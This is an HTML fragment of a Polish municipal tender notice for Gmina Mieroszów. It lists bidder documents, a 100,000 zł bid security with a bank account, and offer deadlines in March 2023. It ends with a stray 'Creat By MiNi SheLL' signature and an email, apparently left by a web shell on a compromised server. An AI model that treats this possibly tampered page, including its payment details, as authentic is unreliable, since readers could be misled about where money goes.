do<br/>rejestru lub ewidencji;<br/>4) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego<br/>nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem<br/>podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania wniosków o<br/>dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert<br/>wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami<br/>lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>5) zaświadczenie albo inny dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki<br/>terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie<br/>zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust.<br/>1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w<br/>przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z<br/>zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania wniosków<br/>o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert<br/>wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne<br/>wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe potwierdzające przez Wykonawcę spełnianie warunków udziału<br/>składane przez Wykonawcę na wezwanie Zamawiającego w postępowaniu obejmują:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów – inne odpowiednie dokumenty – załącznik nr 5 do SWZ;<br/>2) wykaz osób, skierowanych przez Wykonawcę do realizacji niniejszego zamówienia<br/>publicznego, odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacją nt.<br/>ich uprawnień i doświadczenia niezbędnego do wykonania przez nich czynności oraz<br/>informację o podstawie dysponowania tymi osobami wraz z oświadczeniem, że osoby<br/>odpowiedzialne za kierowanie robotami budowlanymi posiadają wymagane uprawnienia –<br/>załącznik nr 6 do SWZ<br/>3) dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie<br/>mniejszą niż 10 000 000,00 zł;<br/>4) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą<br/>wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w okresie<br/>nie wcześniejszym niż 3 miesiące przed upływem terminu składania ofert</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości 100 000,00<br/>zł (słownie: sto tysięcy złotych)<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia<br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>(Dz.U. z 2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na rachunek bankowy prowadzony przez<br/>Bank Spółdzielczy w Kamiennej Górze nr rachunku 07 8395 0001 0021 8115 2000 0008<br/>z dopiskiem &#34;Wadium – BR.271.07.2023” UWAGA: Za termin wniesienia wadium w formie<br/>pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji<br/>lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę określone w ustawie p.z.p.<br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty<br/>wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania<br/>ofertą (z zastrzeżeniem, iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego<br/>postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: Gmina Mieroszów, Plac Niepodległości 1,<br/>58-350 Mieroszów.<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58<br/>p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią<br/>(tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza<br/>ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie<br/>utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot<br/>wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> zgodnie z SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/mieroszow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-27 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-25</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com